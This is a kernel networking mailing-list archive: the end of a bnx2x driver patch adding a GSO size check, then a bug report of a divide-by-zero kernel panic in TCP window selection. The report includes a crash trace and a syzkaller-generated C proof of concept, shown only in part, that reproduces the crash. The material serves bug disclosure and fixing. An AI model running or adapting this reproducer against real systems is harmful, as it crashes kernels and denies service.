but just ensures the proper bits are set before sending the frame up
to avoid giving the upper layers indigestion."

It is possible to stop AIX from sending these large segments, but it
requires configuration on each LPAR. While ibmveth's behaviour is
admittedly weird, we should fix this here: it shouldn't be possible
for it to cause a firmware panic on another card.

Cc: Thomas Falcon <tlfalcon@linux.vnet.ibm.com> # ibmveth
Cc: Yuval Mintz <Yuval.Mintz@cavium.com> # bnx2x
Thanks-to: Jay Vosburgh <jay.vosburgh@canonical.com> # veth info
Signed-off-by: Daniel Axtens <dja@axtens.net>
---
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h      |  2 ++
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c  | 33 +++++++++++++++---------
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c |  1 -
 3 files changed, 23 insertions(+), 13 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
index 352beff796ae..b36d54737d70 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
@@ -2517,4 +2517,6 @@ void bnx2x_set_rx_ts(struct bnx2x *bp, struct sk_buff *skb);
  */
 int bnx2x_vlan_reconfigure_vid(struct bnx2x *bp);
 
+#define MAX_PACKET_SIZE	(9700)
+
 #endif /* bnx2x.h */
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
index 1216c1f1e052..1c5517a9348c 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
@@ -3742,6 +3742,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	__le16 pkt_size = 0;
 	struct ethhdr *eth;
 	u8 mac_type = UNICAST_ADDRESS;
+	unsigned int pkts_compl = 0, bytes_compl = 0;
 
 #ifdef BNX2X_STOP_ON_ERROR
 	if (unlikely(bp->panic))
@@ -4029,6 +4030,14 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 		   skb->len, hlen, skb_headlen(skb),
 		   skb_shinfo(skb)->gso_size);
 
+		if (unlikely(skb_shinfo(skb)->gso_size + hlen > MAX_PACKET_SIZE)) {
+			BNX2X_ERR("reported gso segment size plus headers "
+				  "(%d + %d) > MAX_PACKET_SIZE; dropping pkt!",
+				  skb_shinfo(skb)->gso_size, hlen);
+
+			goto free_and_drop;
+		}
+
 		tx_start_bd->bd_flags.as_bitfield |= ETH_TX_BD_FLAGS_SW_LSO;
 
 		if (unlikely(skb_headlen(skb) > hlen)) {
@@ -4061,21 +4070,10 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 		mapping = skb_frag_dma_map(&bp->pdev->dev, frag, 0,
 					   skb_frag_size(frag), DMA_TO_DEVICE);
 		if (unlikely(dma_mapping_error(&bp->pdev->dev, mapping))) {
-			unsigned int pkts_compl = 0, bytes_compl = 0;
-
 			DP(NETIF_MSG_TX_QUEUED,
 			   "Unable to map page - dropping packet...\n");
 
-			/* we need unmap all buffers already mapped
-			 * for this SKB;
-			 * first_bd->nbd need to be properly updated
-			 * before call to bnx2x_free_tx_pkt
-			 */
-			first_bd->nbd = cpu_to_le16(nbd);
-			bnx2x_free_tx_pkt(bp, txdata,
-					  TX_BD(txdata->tx_pkt_prod),
-					  &pkts_compl, &bytes_compl);
-			return NETDEV_TX_OK;
+			goto free_and_drop;
 		}
 
 		bd_prod = TX_BD(NEXT_TX_IDX(bd_prod));
@@ -4176,6 +4174,17 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	txdata->tx_pkt++;
 
 	return NETDEV_TX_OK;
+
+free_and_drop:
+	/*
+	 * we need unmap all buffers already mapped for this SKB;
+	 * first_bd->nbd need to be properly updated before call to
+	 * bnx2x_free_tx_pkt
+	 */
+	first_bd->nbd = cpu_to_le16(nbd);
+	bnx2x_free_tx_pkt(bp, txdata, TX_BD(txdata->tx_pkt_prod),
+			  &pkts_compl, &bytes_compl);
+	return NETDEV_TX_OK;
 }
 
 void bnx2x_get_c2s_mapping(struct bnx2x *bp, u8 *c2s_map, u8 *c2s_default)
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
index 7dd83d0ef0a0..59a3a9419cde 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
@@ -189,7 +189,6 @@ typedef int (*read_sfp_module_eeprom_func_p)(struct bnx2x_phy *phy,
 #define ETS_E3B0_NIG_MIN_W_VAL_20GBPS			(2720)
 #define ETS_E3B0_PBF_MIN_W_VAL				(10000)
 
-#define MAX_PACKET_SIZE					(9700)
 #define MAX_KR_LINK_RETRY				4
 #define DEFAULT_TX_DRV_BRDCT		2
 #define DEFAULT_TX_DRV_IFIR		0
-- 
2.11.0

^ permalink raw reply related

* net/ipv4: divide error in __tcp_select_window
From: idaifish @ 2017-08-31  5:56 UTC (permalink / raw)
  To: davem, Alexey Kuznetsov; +Cc: netdev, syzkaller

[-- Attachment #1: Type: text/plain, Size: 2622 bytes --]

Hi:
   This bug seems still can be triggered by the attached PoC on latest
Ubuntu1604 (4.4.0-94-generic)

============================================================================
divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>]  [<ffffffff829c1df3>]
__tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8  EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS:  00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
 ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
 0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
 ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
 [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
 [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
 [<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
 [<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
 [<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
 [<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
 [<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
 [<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
 [<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45
d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41>
f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0
net/ipv4/tcp_output.c:2499
 RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..
================================================================================


-- 
Regards,
idaifish

[-- Attachment #2: report.txt --]
[-- Type: text/plain, Size: 2334 bytes --]

divide error: 0000 [#1] SMP KASAN
Modules linked in:
CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
task: ffff880076ab9900 task.stack: ffff880062ae8000
RIP: 0010:[<ffffffff829c1df3>]  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
RSP: 0018:ffff880062aef6e8  EFLAGS: 00010283
RAX: 00000000000000ac RBX: 0000000000000000 RCX: ffffc9000195b000
RDX: 0000000000000000 RSI: 0000000000000436 RDI: ffff880079add085
RBP: ffff880062aef728 R08: 0000000000001800 R09: 0000000000000002
R10: 0000000000000000 R11: 0000000000000000 R12: 00000000000000ac
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000001
FS:  00007f15c239a700(0000) GS:ffff88007fc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000002001c000 CR3: 0000000079628000 CR4: 00000000000006f0
DR0: 0000000000008000 DR1: 0000000000008000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
Stack:
 ffff880062aef6e8 ffff880062aef6e8 0000000000000000 ffff880079adca40
 0000000000000000 0000000000000436 ffff880079adcae8 0000000000000436
 ffff880062aef758 ffffffff8297c36e 0000000000000068 0000000000000000
Call Trace:
 [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
 [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937
 [<ffffffff82a3c32e>] inet_recvmsg+0x26e/0x3b0 net/ipv4/af_inet.c:765
 [<ffffffff827c84aa>] sock_recvmsg_nosec+0x8a/0xb0 net/socket.c:723
 [<ffffffff827d0849>] ___sys_recvmsg+0x229/0x510 net/socket.c:2113
 [<ffffffff827d25fe>] __sys_recvmmsg+0x23e/0x660 net/socket.c:2221
 [<ffffffff827d2aff>] SYSC_recvmmsg net/socket.c:2302 [inline]
 [<ffffffff827d2aff>] SyS_recvmmsg+0xdf/0x180 net/socket.c:2286
 [<ffffffff82dfb3b7>] entry_SYSCALL_64_fastpath+0x1a/0xa9
Code: ec 7c 1f e8 b0 44 9d fe 44 3b 75 d4 75 c2 e8 a5 44 9d fe 8b 45 d0 44 01 e8 41 39 c4 41 0f 4f dc eb ae e8 91 44 9d fe 44 89 e0 99 <41> f7 fe 41 0f af c6 89 c3 eb 9a e8 7d 44 9d fe 48 8d bb 91 04
RIP  [<ffffffff829c1df3>] __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
 RSP <ffff880062aef6e8>
---[ end trace 771dfab907a5c7aa ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
Rebooting in 86400 seconds..

[-- Attachment #3: poc.c --]
[-- Type: text/x-csrc, Size: 38406 bytes --]

// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <dirent.h>
#include <errno.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

const int kFailStatus = 67;
const int kRetryStatus = 69;

__attribute__((noreturn)) static void doexit(int status)
{
  volatile unsigned i;
  syscall(__NR_exit_group, status);
  for (i = 0;; i++) {
  }
}

__attribute__((noreturn)) static void fail(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit((e == ENOMEM || e == EAGAIN) ? kRetryStatus : kFailStatus);
}

__attribute__((noreturn)) static void exitf(const char* msg, ...)
{
  int e = errno;
  fflush(stdout);
  va_list args;
  va_start(args, msg);
  vfprintf(stderr, msg, args);
  va_end(args);
  fprintf(stderr, " (errno %d)\n", e);
  doexit(kRetryStatus);
}

static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* uctx)
{
  uintptr_t addr = (uintptr_t)info->si_addr;
  const uintptr_t prog_start = 1 << 20;
  const uintptr_t prog_end = 100 << 20;
  if (__atomic_load_n(&skip_segv, __ATOMIC_RELAXED) &&
      (addr < prog_start || addr > prog_end)) {
    _longjmp(segv_env, 1);
  }
  doexit(sig);
  for (;;) {
  }
}

static void install_segv_handler()
{
  struct sigaction sa;

  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = SIG_IGN;
  syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
  syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);

  memset(&sa, 0, sizeof(sa));
  sa.sa_sigaction = segv_handler;
  sa.sa_flags = SA_NODEFER | SA_SIGINFO;
  sigaction(SIGSEGV, &sa, NULL);
  sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...)                                                \
  {                                                                    \
    __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
    if (_setjmp(segv_env) == 0) {                                      \
      __VA_ARGS__;                                                     \
    }                                                                  \
    __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST);               \
  }

static void use_temporary_dir()
{
  char tmpdir_template[] = "./syzkaller.XXXXXX";
  char* tmpdir = mkdtemp(tmpdir_template);
  if (!tmpdir)
    fail("failed to mkdtemp");
  if (chmod(tmpdir, 0777))
    fail("failed to chmod");
  if (chdir(tmpdir))
    fail("failed to chdir");
}

static void remove_dir(const char* dir)
{
  DIR* dp;
  struct dirent* ep;
  int iter = 0;
retry:
  dp = opendir(dir);
  if (dp == NULL) {
    if (errno == EMFILE) {
      exitf("opendir(%s) failed due to NOFILE, exiting");
    }
    exitf("opendir(%s) failed", dir);
  }
  while ((ep = readdir(dp))) {
    if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0)
      continue;
    char filename[FILENAME_MAX];
    snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
    struct stat st;
    if (lstat(filename, &st))
      exitf("lstat(%s) failed", filename);
    if (S_ISDIR(st.st_mode)) {
      remove_dir(filename);
      continue;
    }
    int i;
    for (i = 0;; i++) {
      if (unlink(filename) == 0)
        break;
      if (errno == EROFS) {
        break;
      }
      if (errno != EBUSY || i > 100)
        exitf("unlink(%s) failed", filename);
      if (umount2(filename, MNT_DETACH))
        exitf("umount(%s) failed", filename);
    }
  }
  closedir(dp);
  int i;
  for (i = 0;; i++) {
    if (rmdir(dir) == 0)
      break;
    if (i < 100) {
      if (errno == EROFS) {
        break;
      }
      if (errno == EBUSY) {
        if (umount2(dir, MNT_DETACH))
          exitf("umount(%s) failed", dir);
        continue;
      }
      if (errno == ENOTEMPTY) {
        if (iter < 100) {
          iter++;
          goto retry;
        }
      }
    }
    exitf("rmdir(%s) failed", dir);
  }
}

static uint64_t current_time_ms()
{
  struct timespec ts;

  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    fail("clock_gettime failed");
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void test();

void loop()
{
  int iter;
  for (iter = 0;; iter++) {
    char cwdbuf[256];
    sprintf(cwdbuf, "./%d", iter);
    if (mkdir(cwdbuf, 0777))
      fail("failed to mkdir");
    int pid = fork();
    if (pid < 0)
      fail("clone failed");
    if (pid == 0) {
      prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
      setpgrp();
      if (chdir(cwdbuf))
        fail("failed to chdir");
      test();
      doexit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      int res = waitpid(-1, &status, __WALL | WNOHANG);
      if (res == pid)
        break;
      usleep(1000);
      if (current_time_ms() - start > 5 * 1000) {
        kill(-pid, SIGKILL);
        kill(pid, SIGKILL);
        while (waitpid(-1, &status, __WALL) != pid) {
        }
        break;
      }
    }
    remove_dir(cwdbuf);
  }
}

long r[212];
void* thr(void* arg)
{
  switch ((long)arg) {
  case 0:
    r[0] = syscall(__NR_mmap, 0x20000000ul, 0x1b000ul, 0x3ul, 0x32ul,
                   0xfffffffffffffffful, 0x0ul);
    break;
  case 1:
    r[1] = syscall(__NR_socket, 0x2ul, 0x1ul, 0x0ul);
    break;
  case 2:
    NONFAILING(*(uint32_t*)0x20018ffc = (uint32_t)0x0);
    r[3] = syscall(__NR_setsockopt, r[1], 0x1ul, 0x8ul, 0x20018ffcul,
                   0x4ul);
    break;
  case 3:
    NONFAILING(*(uint16_t*)0x20004000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20004002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20004004 = (uint32_t)0x12000000);
    NONFAILING(*(uint8_t*)0x20004008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20004009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000400f = (uint8_t)0x0);
    r[15] = syscall(__NR_bind, r[1], 0x20004000ul, 0x10ul);
    break;
  case 4:
    NONFAILING(*(uint16_t*)0x20003000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x20003002 = (uint16_t)0x204e);
    NONFAILING(*(uint32_t*)0x20003004 = (uint32_t)0x100007f);
    NONFAILING(*(uint8_t*)0x20003008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x20003009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2000300f = (uint8_t)0x0);
    r[27] = syscall(__NR_connect, r[1], 0x20003000ul, 0x10ul);
    break;
  case 5:
    r[28] = syscall(__NR_mmap, 0x2001c000ul, 0x1000ul, 0x1ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 6:
    r[29] = syscall(__NR_mmap, 0x2001d000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 7:
    r[30] = syscall(__NR_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 8:
    r[31] = syscall(__NR_mmap, 0x20023000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 9:
    r[32] = syscall(__NR_mmap, 0x2002b000ul, 0x1000ul, 0x3ul, 0x32ul,
                    0xfffffffffffffffful, 0x0ul);
    break;
  case 10:
    NONFAILING(*(uint64_t*)0x2002bdc0 = (uint64_t)0x20000000);
    NONFAILING(*(uint32_t*)0x2002bdc8 = (uint32_t)0x8);
    NONFAILING(*(uint64_t*)0x2002bdd0 = (uint64_t)0x20022fa0);
    NONFAILING(*(uint64_t*)0x2002bdd8 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bde0 = (uint64_t)0x20022000);
    NONFAILING(*(uint64_t*)0x2002bde8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf0 = (uint32_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bdf8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002be00 = (uint64_t)0x20023ff0);
    NONFAILING(*(uint32_t*)0x2002be08 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be10 = (uint64_t)0x20001000);
    NONFAILING(*(uint64_t*)0x2002be18 = (uint64_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be20 = (uint64_t)0x2000d000);
    NONFAILING(*(uint64_t*)0x2002be28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002be38 = (uint32_t)0x80000000);
    NONFAILING(*(uint64_t*)0x2002be40 = (uint64_t)0x20024ffa);
    NONFAILING(*(uint32_t*)0x2002be48 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002be50 = (uint64_t)0x2001f000);
    NONFAILING(*(uint64_t*)0x2002be58 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2002be60 = (uint64_t)0x20024000);
    NONFAILING(*(uint64_t*)0x2002be68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002be70 = (uint32_t)0x2);
    NONFAILING(*(uint32_t*)0x2002be78 = (uint32_t)0x4);
    NONFAILING(*(uint64_t*)0x2002be80 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002be88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002be90 = (uint64_t)0x20009000);
    NONFAILING(*(uint64_t*)0x2002be98 = (uint64_t)0x1);
    NONFAILING(*(uint64_t*)0x2002bea0 = (uint64_t)0x20025fe7);
    NONFAILING(*(uint64_t*)0x2002bea8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002beb0 = (uint32_t)0x8);
    NONFAILING(*(uint32_t*)0x2002beb8 = (uint32_t)0x101);
    NONFAILING(*(uint64_t*)0x2002bec0 = (uint64_t)0x20025000);
    NONFAILING(*(uint32_t*)0x2002bec8 = (uint32_t)0x58);
    NONFAILING(*(uint64_t*)0x2002bed0 = (uint64_t)0x2000cfb0);
    NONFAILING(*(uint64_t*)0x2002bed8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bee0 = (uint64_t)0x20026000);
    NONFAILING(*(uint64_t*)0x2002bee8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bef0 = (uint32_t)0xffff);
    NONFAILING(*(uint32_t*)0x2002bef8 = (uint32_t)0x46);
    NONFAILING(*(uint64_t*)0x2002bf00 = (uint64_t)0x20027ffa);
    NONFAILING(*(uint32_t*)0x2002bf08 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf10 = (uint64_t)0x20004f90);
    NONFAILING(*(uint64_t*)0x2002bf18 = (uint64_t)0x7);
    NONFAILING(*(uint64_t*)0x2002bf20 = (uint64_t)0x20016000);
    NONFAILING(*(uint64_t*)0x2002bf28 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf30 = (uint32_t)0x6);
    NONFAILING(*(uint32_t*)0x2002bf38 = (uint32_t)0x1ff);
    NONFAILING(*(uint64_t*)0x2002bf40 = (uint64_t)0x20000ff0);
    NONFAILING(*(uint32_t*)0x2002bf48 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf50 = (uint64_t)0x20028000);
    NONFAILING(*(uint64_t*)0x2002bf58 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bf60 = (uint64_t)0x20017000);
    NONFAILING(*(uint64_t*)0x2002bf68 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bf70 = (uint32_t)0x3);
    NONFAILING(*(uint32_t*)0x2002bf78 = (uint32_t)0x6);
    NONFAILING(*(uint64_t*)0x2002bf80 = (uint64_t)0x2001c000);
    NONFAILING(*(uint32_t*)0x2002bf88 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bf90 = (uint64_t)0x2000bfc0);
    NONFAILING(*(uint64_t*)0x2002bf98 = (uint64_t)0x4);
    NONFAILING(*(uint64_t*)0x2002bfa0 = (uint64_t)0x20029fdf);
    NONFAILING(*(uint64_t*)0x2002bfa8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bfb0 = (uint32_t)0x4);
    NONFAILING(*(uint32_t*)0x2002bfb8 = (uint32_t)0x0);
    NONFAILING(*(uint64_t*)0x2002bfc0 = (uint64_t)0x20015b87);
    NONFAILING(*(uint32_t*)0x2002bfc8 = (uint32_t)0x10);
    NONFAILING(*(uint64_t*)0x2002bfd0 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x2002bfd8 = (uint64_t)0x5);
    NONFAILING(*(uint64_t*)0x2002bfe0 = (uint64_t)0x20012f3f);
    NONFAILING(*(uint64_t*)0x2002bfe8 = (uint64_t)0x0);
    NONFAILING(*(uint32_t*)0x2002bff0 = (uint32_t)0x51d);
    NONFAILING(*(uint32_t*)0x2002bff8 = (uint32_t)0x400);
    NONFAILING(*(uint64_t*)0x20022fa0 = (uint64_t)0x20002000);
    NONFAILING(*(uint64_t*)0x20022fa8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fb0 = (uint64_t)0x20001f9c);
    NONFAILING(*(uint64_t*)0x20022fb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fc0 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x20022fc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fd0 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20022fd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022fe0 = (uint64_t)0x20009000);
    NONFAILING(*(uint64_t*)0x20022fe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20022ff0 = (uint64_t)0x20005fd1);
    NONFAILING(*(uint64_t*)0x20022ff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001000 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20001008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001010 = (uint64_t)0x20016f90);
    NONFAILING(*(uint64_t*)0x20001018 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001020 = (uint64_t)0x20000000);
    NONFAILING(*(uint64_t*)0x20001028 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001030 = (uint64_t)0x20023000);
    NONFAILING(*(uint64_t*)0x20001038 = (uint64_t)0x1000);
    NONFAILING(*(uint64_t*)0x20001040 = (uint64_t)0x20023f80);
    NONFAILING(*(uint64_t*)0x20001048 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20001050 = (uint64_t)0x20021000);
    NONFAILING(*(uint64_t*)0x20001058 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20009000 = (uint64_t)0x20020000);
    NONFAILING(*(uint64_t*)0x20009008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfb0 = (uint64_t)0x2000d000);
    NONFAILING(*(uint64_t*)0x2000cfb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfc0 = (uint64_t)0x20026f0e);
    NONFAILING(*(uint64_t*)0x2000cfc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfd0 = (uint64_t)0x20026fcc);
    NONFAILING(*(uint64_t*)0x2000cfd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cfe0 = (uint64_t)0x20026000);
    NONFAILING(*(uint64_t*)0x2000cfe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x2000cff0 = (uint64_t)0x2000b000);
    NONFAILING(*(uint64_t*)0x2000cff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004f90 = (uint64_t)0x20027f2c);
    NONFAILING(*(uint64_t*)0x20004f98 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fa0 = (uint64_t)0x2000a000);
    NONFAILING(*(uint64_t*)0x20004fa8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fb0 = (uint64_t)0x20027ff3);
    NONFAILING(*(uint64_t*)0x20004fb8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fc0 = (uint64_t)0x20027000);
    NONFAILING(*(uint64_t*)0x20004fc8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fd0 = (uint64_t)0x20009ff4);
    NONFAILING(*(uint64_t*)0x20004fd8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004fe0 = (uint64_t)0x2001d000);
    NONFAILING(*(uint64_t*)0x20004fe8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20004ff0 = (uint64_t)0x20005000);
    NONFAILING(*(uint64_t*)0x20004ff8 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028000 = (uint64_t)0x20028fb6);
    NONFAILING(*(uint64_t*)0x20028008 = (uint64_t)0x0);
    NONFAILING(*(uint64_t*)0x20028010 = (uint64_t)0x20008000);
    NONFAILING(*(uint64_t*)0x20028018 = (uint64_t)0x0);
